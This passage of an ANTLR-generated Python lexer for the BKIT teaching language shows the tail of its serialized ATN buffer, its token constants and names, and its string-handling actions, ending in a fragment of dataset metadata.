buf.write(\"\\2\\u0123\\u0120\\3\\2\\2\\2\\u0123\\u0121\\3\\2\\2\\2\\u0123\\u0122\")\n buf.write(\"\\3\\2\\2\\2\\u0124&\\3\\2\\2\\2\\u0125\\u0126\\5\\21\\t\\2\\u0126(\\3\")\n buf.write(\"\\2\\2\\2\\u0127\\u012a\\5Q)\\2\\u0128\\u012a\\5S*\\2\\u0129\\u0127\")\n buf.write(\"\\3\\2\\2\\2\\u0129\\u0128\\3\\2\\2\\2\\u012a*\\3\\2\\2\\2\\u012b\\u012f\")\n buf.write(\"\\5\\u009bN\\2\\u012c\\u012e\\5\\31\\r\\2\\u012d\\u012c\\3\\2\\2\\2\\u012e\")\n buf.write(\"\\u0131\\3\\2\\2\\2\\u012f\\u012d\\3\\2\\2\\2\\u012f\\u0130\\3\\2\\2\\2\")\n buf.write(\"\\u0130\\u0132\\3\\2\\2\\2\\u0131\\u012f\\3\\2\\2\\2\\u0132\\u0133\\5\")\n buf.write(\"\\u009bN\\2\\u0133\\u0134\\b\\26\\2\\2\\u0134,\\3\\2\\2\\2\\u0135\\u0136\")\n 
buf.write(\"\\7D\\2\\2\\u0136\\u0137\\7q\\2\\2\\u0137\\u0138\\7f\\2\\2\\u0138\\u0139\")\n buf.write(\"\\7{\\2\\2\\u0139.\\3\\2\\2\\2\\u013a\\u013b\\7D\\2\\2\\u013b\\u013c\")\n buf.write(\"\\7t\\2\\2\\u013c\\u013d\\7g\\2\\2\\u013d\\u013e\\7c\\2\\2\\u013e\\u013f\")\n buf.write(\"\\7m\\2\\2\\u013f\\60\\3\\2\\2\\2\\u0140\\u0141\\7E\\2\\2\\u0141\\u0142\")\n buf.write(\"\\7q\\2\\2\\u0142\\u0143\\7p\\2\\2\\u0143\\u0144\\7v\\2\\2\\u0144\\u0145\")\n buf.write(\"\\7k\\2\\2\\u0145\\u0146\\7p\\2\\2\\u0146\\u0147\\7w\\2\\2\\u0147\\u0148\")\n buf.write(\"\\7g\\2\\2\\u0148\\62\\3\\2\\2\\2\\u0149\\u014a\\7F\\2\\2\\u014a\\u014b\")\n buf.write(\"\\7q\\2\\2\\u014b\\64\\3\\2\\2\\2\\u014c\\u014d\\7G\\2\\2\\u014d\\u014e\")\n buf.write(\"\\7n\\2\\2\\u014e\\u014f\\7u\\2\\2\\u014f\\u0150\\7g\\2\\2\\u0150\\66\")\n buf.write(\"\\3\\2\\2\\2\\u0151\\u0152\\7G\\2\\2\\u0152\\u0153\\7n\\2\\2\\u0153\\u0154\")\n buf.write(\"\\7u\\2\\2\\u0154\\u0155\\7g\\2\\2\\u0155\\u0156\\7K\\2\\2\\u0156\\u0157\")\n buf.write(\"\\7h\\2\\2\\u01578\\3\\2\\2\\2\\u0158\\u0159\\7G\\2\\2\\u0159\\u015a\")\n buf.write(\"\\7p\\2\\2\\u015a\\u015b\\7f\\2\\2\\u015b\\u015c\\7K\\2\\2\\u015c\\u015d\")\n buf.write(\"\\7h\\2\\2\\u015d:\\3\\2\\2\\2\\u015e\\u015f\\7G\\2\\2\\u015f\\u0160\")\n buf.write(\"\\7p\\2\\2\\u0160\\u0161\\7f\\2\\2\\u0161\\u0162\\7D\\2\\2\\u0162\\u0163\")\n buf.write(\"\\7q\\2\\2\\u0163\\u0164\\7f\\2\\2\\u0164\\u0165\\7{\\2\\2\\u0165<\\3\")\n buf.write(\"\\2\\2\\2\\u0166\\u0167\\7G\\2\\2\\u0167\\u0168\\7p\\2\\2\\u0168\\u0169\")\n buf.write(\"\\7f\\2\\2\\u0169\\u016a\\7H\\2\\2\\u016a\\u016b\\7q\\2\\2\\u016b\\u016c\")\n buf.write(\"\\7t\\2\\2\\u016c>\\3\\2\\2\\2\\u016d\\u016e\\7G\\2\\2\\u016e\\u016f\")\n buf.write(\"\\7p\\2\\2\\u016f\\u0170\\7f\\2\\2\\u0170\\u0171\\7Y\\2\\2\\u0171\\u0172\")\n buf.write(\"\\7j\\2\\2\\u0172\\u0173\\7k\\2\\2\\u0173\\u0174\\7n\\2\\2\\u0174\\u0175\")\n buf.write(\"\\7g\\2\\2\\u0175@\\3\\2\\2\\2\\u0176\\u0177\\7H\\2\\2\\u0177\\u0178\")\n 
buf.write(\"\\7q\\2\\2\\u0178\\u0179\\7t\\2\\2\\u0179B\\3\\2\\2\\2\\u017a\\u017b\")\n buf.write(\"\\7H\\2\\2\\u017b\\u017c\\7w\\2\\2\\u017c\\u017d\\7p\\2\\2\\u017d\\u017e\")\n buf.write(\"\\7e\\2\\2\\u017e\\u017f\\7v\\2\\2\\u017f\\u0180\\7k\\2\\2\\u0180\\u0181\")\n buf.write(\"\\7q\\2\\2\\u0181\\u0182\\7p\\2\\2\\u0182D\\3\\2\\2\\2\\u0183\\u0184\")\n buf.write(\"\\7K\\2\\2\\u0184\\u0185\\7h\\2\\2\\u0185F\\3\\2\\2\\2\\u0186\\u0187\")\n buf.write(\"\\7R\\2\\2\\u0187\\u0188\\7c\\2\\2\\u0188\\u0189\\7t\\2\\2\\u0189\\u018a\")\n buf.write(\"\\7c\\2\\2\\u018a\\u018b\\7o\\2\\2\\u018b\\u018c\\7g\\2\\2\\u018c\\u018d\")\n buf.write(\"\\7v\\2\\2\\u018d\\u018e\\7g\\2\\2\\u018e\\u018f\\7t\\2\\2\\u018fH\\3\")\n buf.write(\"\\2\\2\\2\\u0190\\u0191\\7T\\2\\2\\u0191\\u0192\\7g\\2\\2\\u0192\\u0193\")\n buf.write(\"\\7v\\2\\2\\u0193\\u0194\\7w\\2\\2\\u0194\\u0195\\7t\\2\\2\\u0195\\u0196\")\n buf.write(\"\\7p\\2\\2\\u0196J\\3\\2\\2\\2\\u0197\\u0198\\7V\\2\\2\\u0198\\u0199\")\n buf.write(\"\\7j\\2\\2\\u0199\\u019a\\7g\\2\\2\\u019a\\u019b\\7p\\2\\2\\u019bL\\3\")\n buf.write(\"\\2\\2\\2\\u019c\\u019d\\7X\\2\\2\\u019d\\u019e\\7c\\2\\2\\u019e\\u019f\")\n buf.write(\"\\7t\\2\\2\\u019fN\\3\\2\\2\\2\\u01a0\\u01a1\\7Y\\2\\2\\u01a1\\u01a2\")\n buf.write(\"\\7j\\2\\2\\u01a2\\u01a3\\7k\\2\\2\\u01a3\\u01a4\\7n\\2\\2\\u01a4\\u01a5\")\n buf.write(\"\\7g\\2\\2\\u01a5P\\3\\2\\2\\2\\u01a6\\u01a7\\7V\\2\\2\\u01a7\\u01a8\")\n buf.write(\"\\7t\\2\\2\\u01a8\\u01a9\\7w\\2\\2\\u01a9\\u01aa\\7g\\2\\2\\u01aaR\\3\")\n buf.write(\"\\2\\2\\2\\u01ab\\u01ac\\7H\\2\\2\\u01ac\\u01ad\\7c\\2\\2\\u01ad\\u01ae\")\n buf.write(\"\\7n\\2\\2\\u01ae\\u01af\\7u\\2\\2\\u01af\\u01b0\\7g\\2\\2\\u01b0T\\3\")\n buf.write(\"\\2\\2\\2\\u01b1\\u01b2\\7G\\2\\2\\u01b2\\u01b3\\7p\\2\\2\\u01b3\\u01b4\")\n buf.write(\"\\7f\\2\\2\\u01b4\\u01b5\\7F\\2\\2\\u01b5\\u01b6\\7q\\2\\2\\u01b6V\\3\")\n buf.write(\"\\2\\2\\2\\u01b7\\u01b8\\7-\\2\\2\\u01b8X\\3\\2\\2\\2\\u01b9\\u01ba\\7\")\n 
buf.write(\"-\\2\\2\\u01ba\\u01bb\\7\\60\\2\\2\\u01bbZ\\3\\2\\2\\2\\u01bc\\u01bd\")\n buf.write(\"\\7/\\2\\2\\u01bd\\\\\\3\\2\\2\\2\\u01be\\u01bf\\7/\\2\\2\\u01bf\\u01c0\")\n buf.write(\"\\7\\60\\2\\2\\u01c0^\\3\\2\\2\\2\\u01c1\\u01c2\\7,\\2\\2\\u01c2`\\3\\2\")\n buf.write(\"\\2\\2\\u01c3\\u01c4\\7,\\2\\2\\u01c4\\u01c5\\7\\60\\2\\2\\u01c5b\\3\")\n buf.write(\"\\2\\2\\2\\u01c6\\u01c7\\7^\\2\\2\\u01c7d\\3\\2\\2\\2\\u01c8\\u01c9\\7\")\n buf.write(\"^\\2\\2\\u01c9\\u01ca\\7\\60\\2\\2\\u01caf\\3\\2\\2\\2\\u01cb\\u01cc\")\n buf.write(\"\\7^\\2\\2\\u01cc\\u01cd\\7\\'\\2\\2\\u01cdh\\3\\2\\2\\2\\u01ce\\u01cf\")\n buf.write(\"\\7#\\2\\2\\u01cfj\\3\\2\\2\\2\\u01d0\\u01d1\\7(\\2\\2\\u01d1\\u01d2\")\n buf.write(\"\\7(\\2\\2\\u01d2l\\3\\2\\2\\2\\u01d3\\u01d4\\7~\\2\\2\\u01d4\\u01d5\")\n buf.write(\"\\7~\\2\\2\\u01d5n\\3\\2\\2\\2\\u01d6\\u01d7\\7?\\2\\2\\u01d7\\u01d8\")\n buf.write(\"\\7?\\2\\2\\u01d8p\\3\\2\\2\\2\\u01d9\\u01da\\7#\\2\\2\\u01da\\u01db\")\n buf.write(\"\\7?\\2\\2\\u01dbr\\3\\2\\2\\2\\u01dc\\u01dd\\7>\\2\\2\\u01ddt\\3\\2\\2\")\n buf.write(\"\\2\\u01de\\u01df\\7@\\2\\2\\u01dfv\\3\\2\\2\\2\\u01e0\\u01e1\\7>\\2\")\n buf.write(\"\\2\\u01e1\\u01e2\\7?\\2\\2\\u01e2x\\3\\2\\2\\2\\u01e3\\u01e4\\7@\\2\")\n buf.write(\"\\2\\u01e4\\u01e5\\7?\\2\\2\\u01e5z\\3\\2\\2\\2\\u01e6\\u01e7\\7?\\2\")\n buf.write(\"\\2\\u01e7\\u01e8\\7\\61\\2\\2\\u01e8\\u01e9\\7?\\2\\2\\u01e9|\\3\\2\")\n buf.write(\"\\2\\2\\u01ea\\u01eb\\7>\\2\\2\\u01eb\\u01ec\\7\\60\\2\\2\\u01ec~\\3\")\n buf.write(\"\\2\\2\\2\\u01ed\\u01ee\\7@\\2\\2\\u01ee\\u01ef\\7\\60\\2\\2\\u01ef\\u0080\")\n buf.write(\"\\3\\2\\2\\2\\u01f0\\u01f1\\7>\\2\\2\\u01f1\\u01f2\\7?\\2\\2\\u01f2\\u01f3\")\n buf.write(\"\\7\\60\\2\\2\\u01f3\\u0082\\3\\2\\2\\2\\u01f4\\u01f5\\7@\\2\\2\\u01f5\")\n buf.write(\"\\u01f6\\7?\\2\\2\\u01f6\\u01f7\\7\\60\\2\\2\\u01f7\\u0084\\3\\2\\2\\2\")\n buf.write(\"\\u01f8\\u01f9\\7*\\2\\2\\u01f9\\u0086\\3\\2\\2\\2\\u01fa\\u01fb\\7\")\n 
buf.write(\"+\\2\\2\\u01fb\\u0088\\3\\2\\2\\2\\u01fc\\u01fd\\7]\\2\\2\\u01fd\\u008a\")\n buf.write(\"\\3\\2\\2\\2\\u01fe\\u01ff\\7_\\2\\2\\u01ff\\u008c\\3\\2\\2\\2\\u0200\")\n buf.write(\"\\u0201\\7}\\2\\2\\u0201\\u008e\\3\\2\\2\\2\\u0202\\u0203\\7\\177\\2\")\n buf.write(\"\\2\\u0203\\u0090\\3\\2\\2\\2\\u0204\\u0205\\7<\\2\\2\\u0205\\u0092\")\n buf.write(\"\\3\\2\\2\\2\\u0206\\u0207\\7\\60\\2\\2\\u0207\\u0094\\3\\2\\2\\2\\u0208\")\n buf.write(\"\\u0209\\7=\\2\\2\\u0209\\u0096\\3\\2\\2\\2\\u020a\\u020b\\7.\\2\\2\\u020b\")\n buf.write(\"\\u0098\\3\\2\\2\\2\\u020c\\u020d\\7?\\2\\2\\u020d\\u009a\\3\\2\\2\\2\")\n buf.write(\"\\u020e\\u020f\\7$\\2\\2\\u020f\\u009c\\3\\2\\2\\2\\u0210\\u0211\\7\")\n buf.write(\"k\\2\\2\\u0211\\u0212\\7p\\2\\2\\u0212\\u0213\\7v\\2\\2\\u0213\\u0214\")\n buf.write(\"\\7a\\2\\2\\u0214\\u0215\\7q\\2\\2\\u0215\\u0216\\7h\\2\\2\\u0216\\u0217\")\n buf.write(\"\\7a\\2\\2\\u0217\\u0218\\7h\\2\\2\\u0218\\u0219\\7n\\2\\2\\u0219\\u021a\")\n buf.write(\"\\7q\\2\\2\\u021a\\u021b\\7c\\2\\2\\u021b\\u021c\\7v\\2\\2\\u021c\\u009e\")\n buf.write(\"\\3\\2\\2\\2\\u021d\\u021e\\7k\\2\\2\\u021e\\u021f\\7p\\2\\2\\u021f\\u0220\")\n buf.write(\"\\7v\\2\\2\\u0220\\u0221\\7a\\2\\2\\u0221\\u0222\\7q\\2\\2\\u0222\\u0223\")\n buf.write(\"\\7h\\2\\2\\u0223\\u0224\\7a\\2\\2\\u0224\\u0225\\7u\\2\\2\\u0225\\u0226\")\n buf.write(\"\\7v\\2\\2\\u0226\\u0227\\7t\\2\\2\\u0227\\u0228\\7k\\2\\2\\u0228\\u0229\")\n buf.write(\"\\7p\\2\\2\\u0229\\u022a\\7i\\2\\2\\u022a\\u00a0\\3\\2\\2\\2\\u022b\\u022c\")\n buf.write(\"\\7h\\2\\2\\u022c\\u022d\\7n\\2\\2\\u022d\\u022e\\7q\\2\\2\\u022e\\u022f\")\n buf.write(\"\\7c\\2\\2\\u022f\\u0230\\7v\\2\\2\\u0230\\u0231\\7a\\2\\2\\u0231\\u0232\")\n buf.write(\"\\7v\\2\\2\\u0232\\u0233\\7q\\2\\2\\u0233\\u0234\\7a\\2\\2\\u0234\\u0235\")\n buf.write(\"\\7k\\2\\2\\u0235\\u0236\\7p\\2\\2\\u0236\\u0237\\7v\\2\\2\\u0237\\u00a2\")\n buf.write(\"\\3\\2\\2\\2\\u0238\\u0239\\7h\\2\\2\\u0239\\u023a\\7n\\2\\2\\u023a\\u023b\")\n 
buf.write(\"\\7q\\2\\2\\u023b\\u023c\\7c\\2\\2\\u023c\\u023d\\7v\\2\\2\\u023d\\u023e\")\n buf.write(\"\\7a\\2\\2\\u023e\\u023f\\7q\\2\\2\\u023f\\u0240\\7h\\2\\2\\u0240\\u0241\")\n buf.write(\"\\7a\\2\\2\\u0241\\u0242\\7u\\2\\2\\u0242\\u0243\\7v\\2\\2\\u0243\\u0244\")\n buf.write(\"\\7t\\2\\2\\u0244\\u0245\\7k\\2\\2\\u0245\\u0246\\7p\\2\\2\\u0246\\u0247\")\n buf.write(\"\\7i\\2\\2\\u0247\\u00a4\\3\\2\\2\\2\\u0248\\u0249\\7d\\2\\2\\u0249\\u024a\")\n buf.write(\"\\7q\\2\\2\\u024a\\u024b\\7q\\2\\2\\u024b\\u024c\\7n\\2\\2\\u024c\\u024d\")\n buf.write(\"\\7a\\2\\2\\u024d\\u024e\\7q\\2\\2\\u024e\\u024f\\7h\\2\\2\\u024f\\u0250\")\n buf.write(\"\\7a\\2\\2\\u0250\\u0251\\7u\\2\\2\\u0251\\u0252\\7v\\2\\2\\u0252\\u0253\")\n buf.write(\"\\7t\\2\\2\\u0253\\u0254\\7k\\2\\2\\u0254\\u0255\\7p\\2\\2\\u0255\\u0256\")\n buf.write(\"\\7i\\2\\2\\u0256\\u00a6\\3\\2\\2\\2\\u0257\\u0258\\7u\\2\\2\\u0258\\u0259\")\n buf.write(\"\\7v\\2\\2\\u0259\\u025a\\7t\\2\\2\\u025a\\u025b\\7k\\2\\2\\u025b\\u025c\")\n buf.write(\"\\7p\\2\\2\\u025c\\u025d\\7i\\2\\2\\u025d\\u025e\\7a\\2\\2\\u025e\\u025f\")\n buf.write(\"\\7q\\2\\2\\u025f\\u0260\\7h\\2\\2\\u0260\\u0261\\7a\\2\\2\\u0261\\u0262\")\n buf.write(\"\\7d\\2\\2\\u0262\\u0263\\7q\\2\\2\\u0263\\u0264\\7q\\2\\2\\u0264\\u0265\")\n buf.write(\"\\7n\\2\\2\\u0265\\u00a8\\3\\2\\2\\2\\u0266\\u0267\\7u\\2\\2\\u0267\\u0268\")\n buf.write(\"\\7v\\2\\2\\u0268\\u0269\\7t\\2\\2\\u0269\\u026a\\7k\\2\\2\\u026a\\u026b\")\n buf.write(\"\\7p\\2\\2\\u026b\\u026c\\7i\\2\\2\\u026c\\u026d\\7a\\2\\2\\u026d\\u026e\")\n buf.write(\"\\7q\\2\\2\\u026e\\u026f\\7h\\2\\2\\u026f\\u0270\\7a\\2\\2\\u0270\\u0271\")\n buf.write(\"\\7k\\2\\2\\u0271\\u0272\\7p\\2\\2\\u0272\\u0273\\7v\\2\\2\\u0273\\u00aa\")\n buf.write(\"\\3\\2\\2\\2\\u0274\\u0275\\7u\\2\\2\\u0275\\u0276\\7v\\2\\2\\u0276\\u0277\")\n buf.write(\"\\7t\\2\\2\\u0277\\u0278\\7k\\2\\2\\u0278\\u0279\\7p\\2\\2\\u0279\\u027a\")\n buf.write(\"\\7i\\2\\2\\u027a\\u027b\\7a\\2\\2\\u027b\\u027c\\7q\\2\\2\\u027c\\u027d\")\n 
buf.write(\"\\7h\\2\\2\\u027d\\u027e\\7a\\2\\2\\u027e\\u027f\\7h\\2\\2\\u027f\\u0280\")\n buf.write(\"\\7n\\2\\2\\u0280\\u0281\\7q\\2\\2\\u0281\\u0282\\7c\\2\\2\\u0282\\u0283\")\n buf.write(\"\\7v\\2\\2\\u0283\\u00ac\\3\\2\\2\\2\\u0284\\u0285\\7,\\2\\2\\u0285\\u0286\")\n buf.write(\"\\7,\\2\\2\\u0286\\u028a\\3\\2\\2\\2\\u0287\\u0289\\13\\2\\2\\2\\u0288\")\n buf.write(\"\\u0287\\3\\2\\2\\2\\u0289\\u028c\\3\\2\\2\\2\\u028a\\u028b\\3\\2\\2\\2\")\n buf.write(\"\\u028a\\u0288\\3\\2\\2\\2\\u028b\\u028d\\3\\2\\2\\2\\u028c\\u028a\\3\")\n buf.write(\"\\2\\2\\2\\u028d\\u028e\\7,\\2\\2\\u028e\\u028f\\7,\\2\\2\\u028f\\u0290\")\n buf.write(\"\\3\\2\\2\\2\\u0290\\u0291\\bW\\3\\2\\u0291\\u00ae\\3\\2\\2\\2\\u0292\")\n buf.write(\"\\u0294\\t\\17\\2\\2\\u0293\\u0292\\3\\2\\2\\2\\u0294\\u0295\\3\\2\\2\")\n buf.write(\"\\2\\u0295\\u0293\\3\\2\\2\\2\\u0295\\u0296\\3\\2\\2\\2\\u0296\\u0297\")\n buf.write(\"\\3\\2\\2\\2\\u0297\\u0298\\bX\\3\\2\\u0298\\u00b0\\3\\2\\2\\2\\u0299\")\n buf.write(\"\\u029d\\7$\\2\\2\\u029a\\u029c\\5\\31\\r\\2\\u029b\\u029a\\3\\2\\2\\2\")\n buf.write(\"\\u029c\\u029f\\3\\2\\2\\2\\u029d\\u029b\\3\\2\\2\\2\\u029d\\u029e\\3\")\n buf.write(\"\\2\\2\\2\\u029e\\u02a0\\3\\2\\2\\2\\u029f\\u029d\\3\\2\\2\\2\\u02a0\\u02a1\")\n buf.write(\"\\5\\23\\n\\2\\u02a1\\u02a2\\bY\\4\\2\\u02a2\\u00b2\\3\\2\\2\\2\\u02a3\")\n buf.write(\"\\u02a7\\7$\\2\\2\\u02a4\\u02a6\\5\\31\\r\\2\\u02a5\\u02a4\\3\\2\\2\\2\")\n buf.write(\"\\u02a6\\u02a9\\3\\2\\2\\2\\u02a7\\u02a5\\3\\2\\2\\2\\u02a7\\u02a8\\3\")\n buf.write(\"\\2\\2\\2\\u02a8\\u02ab\\3\\2\\2\\2\\u02a9\\u02a7\\3\\2\\2\\2\\u02aa\\u02ac\")\n buf.write(\"\\t\\20\\2\\2\\u02ab\\u02aa\\3\\2\\2\\2\\u02ac\\u02ad\\3\\2\\2\\2\\u02ad\")\n buf.write(\"\\u02ae\\bZ\\5\\2\\u02ae\\u00b4\\3\\2\\2\\2\\u02af\\u02b0\\7,\\2\\2\\u02b0\")\n buf.write(\"\\u02b1\\7,\\2\\2\\u02b1\\u02b7\\3\\2\\2\\2\\u02b2\\u02b3\\7,\\2\\2\\u02b3\")\n buf.write(\"\\u02b6\\n\\21\\2\\2\\u02b4\\u02b6\\n\\21\\2\\2\\u02b5\\u02b2\\3\\2\\2\")\n 
buf.write(\"\\2\\u02b5\\u02b4\\3\\2\\2\\2\\u02b6\\u02b9\\3\\2\\2\\2\\u02b7\\u02b8\")\n buf.write(\"\\3\\2\\2\\2\\u02b7\\u02b5\\3\\2\\2\\2\\u02b8\\u02ba\\3\\2\\2\\2\\u02b9\")\n buf.write(\"\\u02b7\\3\\2\\2\\2\\u02ba\\u02bb\\7\\2\\2\\3\\u02bb\\u00b6\\3\\2\\2\\2\")\n buf.write(\"\\u02bc\\u02bd\\13\\2\\2\\2\\u02bd\\u00b8\\3\\2\\2\\2\\35\\2\\u00be\\u00c0\")\n buf.write(\"\\u00cb\\u00d0\\u00d5\\u00db\\u00e1\\u00e5\\u00e8\\u00f6\\u0100\")\n buf.write(\"\\u0106\\u010e\\u0111\\u0117\\u011d\\u0123\\u0129\\u012f\\u028a\")\n buf.write(\"\\u0295\\u029d\\u02a7\\u02ab\\u02b5\\u02b7\\6\\3\\26\\2\\b\\2\\2\\3\")\n buf.write(\"Y\\3\\3Z\\4\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n INT_LIT = 2\n FLOAT_LIT = 3\n BOOL_LIT = 4\n STRING_LIT = 5\n BODY = 6\n BREAK = 7\n CONTINUE = 8\n DO = 9\n ELSE = 10\n ELSEIF = 11\n ENDIF = 12\n ENDBODY = 13\n ENDFOR = 14\n ENDWHILE = 15\n FOR = 16\n FUNCTION = 17\n IF = 18\n PARAMETER = 19\n RETURN = 20\n THEN = 21\n VAR = 22\n WHILE = 23\n TRUE = 24\n FALSE = 25\n ENDDO = 26\n PLUS_INT = 27\n PLUS_FLOAT = 28\n MINUS_INT = 29\n MINUS_FLOAT = 30\n STAR_INT = 31\n STAR_FLOAT = 32\n DIV_INT = 33\n DIV_FLOAT = 34\n MOD = 35\n NOT = 36\n AND = 37\n OR = 38\n EQUAL = 39\n NOT_EQUAL_INT = 40\n LESS_INT = 41\n GREATER_INT = 42\n LESS_OR_EQUAL_INT = 43\n GREATER_OR_EQUAL_INT = 44\n NOT_EQUAL_FLOAT = 45\n LESS_FLOAT = 46\n GREATER_FLOAT = 47\n LESS_OR_EQUAL_FLOAT = 48\n GREATER_OR_EQUAL_FLOAT = 49\n LEFT_PAREN = 50\n RIGHT_PAREN = 51\n LEFT_BRACKET = 52\n RIGHT_BRACKET = 53\n LEFT_BRACE = 54\n RIGHT_BRACE = 55\n COLON = 56\n DOT = 57\n SEMI = 58\n COMMA = 59\n ASSIGN = 60\n DOUBLE_QUOTE = 61\n INT_OF_FLOAT = 62\n INT_OF_STRING = 63\n FLOAT_TO_INT = 64\n FLOAT_OF_STRING = 65\n BOOL_OF_STRING = 66\n STRING_OF_BOOL = 67\n STRING_OF_INT = 68\n STRING_OF_FLOAT = 69\n COMMENT = 70\n WS = 71\n ILLEGAL_ESCAPE 
= 72\n UNCLOSE_STRING = 73\n UNTERMINATED_COMMENT = 74\n ERROR_CHAR = 75\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElseIf'\", \n \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'\\\\%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \n \"'int_of_string'\", \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"DOUBLE_QUOTE\", \n \"INT_OF_FLOAT\", \"INT_OF_STRING\", 
\"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \n \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \n \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n ruleNames = [ \"ID\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \n \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \n \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n 
self._predicates = None\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[20] = self.STRING_LIT_action \n actions[87] = self.ILLEGAL_ESCAPE_action \n actions[88] = self.UNCLOSE_STRING_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def STRING_LIT_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n def ILLEGAL_ESCAPE_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 2:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n\n" }, { "alpha_fraction": 0.4293690621852875, "alphanum_fraction": 0.5801228284835815, 